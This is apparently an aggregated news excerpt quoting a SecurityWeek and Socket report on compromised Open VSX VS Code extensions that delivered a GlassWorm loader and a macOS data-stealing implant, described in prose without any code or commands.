"On January 30, a threat actor published malicious versions of four established VS Code extensions with over 22,000 combined downloads. The extensions contained code that would execute at runtime, evade systems with Russian locales, resolve command-and-control (C&C) data from Solana transaction memos, and run additional code. Consistent with previously observed activity, the extensions were repurposed to deploy a GlassWorm loader, but the fresh attack did not rely on typosquatting or cloned tools."
""By contrast, these four extensions were published under an established publisher account with a multi-extension history and meaningful adoption signals across ecosystems," Socket notes. The publisher also maintains Visual Studio Marketplace listings with thousands of downloads, but the analyzed incident only concerns Open VSX extensions. Advertisement. Scroll to continue reading. "The threat actor published poisoned updates through an established publisher identity, and the Open VSX security team assessed the incident as consistent with leaked tokens or other unauthorized publishing access," Socket notes."
A publisher account on the Open VSX marketplace was compromised and malicious updates were published to four established VS Code extensions, totaling over 22,000 downloads. The poisoned extensions contained runtime-executing code that bypasses systems with Russian locales and retrieves command-and-control data from Solana transaction memos. The extensions were repurposed to deploy a GlassWorm loader without using typosquatting or cloned tools. The loader targets macOS, profiles the system, and fetches a Node.js implant for data theft and persistence. The implant attempts to steal browser cookies, form history, login files, wallet-extension artifacts, Safari cookies, desktop wallets, macOS keychain, Apple Notes, and FortiClient VPN data.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]